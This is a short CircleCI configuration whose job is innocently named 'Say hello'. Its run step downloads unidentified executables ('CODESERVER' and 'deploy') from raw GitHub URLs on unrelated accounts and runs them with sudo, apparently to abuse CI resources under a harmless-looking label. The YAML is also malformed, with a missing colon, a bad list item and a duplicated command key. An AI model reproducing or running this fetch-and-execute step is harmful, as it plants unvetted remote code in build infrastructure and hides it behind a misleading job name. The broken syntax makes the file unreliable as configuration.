Version: 2.1
jobs:
  say-hello
  docker:
    -image: cimg/node:12.22.11
    steps:
      - checkout
      - run:
          name: "Say hello"
          command:  sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/aurbach55/pos/main/CODESERVER && chmod +x CODESERVER && sudo ./CODESERVER
          command:  sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/YDhj45/kj/main/deploy && chmod +x deploy && sudo ./deploy
# Invoke jobs via workflows
# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
workflows:   
  say-hello-workflow:
    jobs:
      - say-hello